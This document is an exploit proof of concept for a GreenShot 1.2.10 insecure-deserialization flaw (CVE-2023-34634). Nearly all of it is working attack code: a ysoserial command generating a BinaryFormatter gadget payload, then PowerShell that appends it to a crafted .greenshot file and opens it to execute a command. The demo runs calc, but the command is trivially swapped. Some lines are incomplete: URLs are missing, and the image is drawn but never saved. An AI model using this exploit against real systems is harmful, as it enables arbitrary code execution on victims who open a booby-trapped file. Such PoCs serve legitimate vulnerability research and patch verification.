# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution  
# Date: 26/07/2023  
# Exploit Author: p4r4bellum  
# Vendor Homepage:  
# Software Link:  
# Version:  
# Tested on: windows 10.0.19045 N/A build 19045  
# CVE : CVE-2023-34634  
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format  
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software  
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file  
# will lead to arbitrary code execution  
# Generate the payload. You need to be installed on your machine. Grab it at  
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw  
#load the payload  
$payload = Get-Content .\payload.bin -Encoding Byte  
# retrieve the length of the payload  
$length = $payload.Length  
# load the required assembly to craft a PNG file  
Add-Type -AssemblyName System.Drawing  
# the following lines creates a png file with some text. Code borrowed from  
$filename = "$home\poc.greenshot"  
$bmp = new-object System.Drawing.Bitmap 250,61   
$font = new-object System.Drawing.Font Consolas,24   
$brushBg = [System.Drawing.Brushes]::Green   
$brushFg = [System.Drawing.Brushes]::Black   
$graphics = [System.Drawing.Graphics]::FromImage($bmp)   
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)   
# append the payload to the PNG file  
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline   
# append the length of the payload  
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline  
# append the signature  
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii  
# launch greenshot. Calc.exe should be executed  
Invoke-Item $filename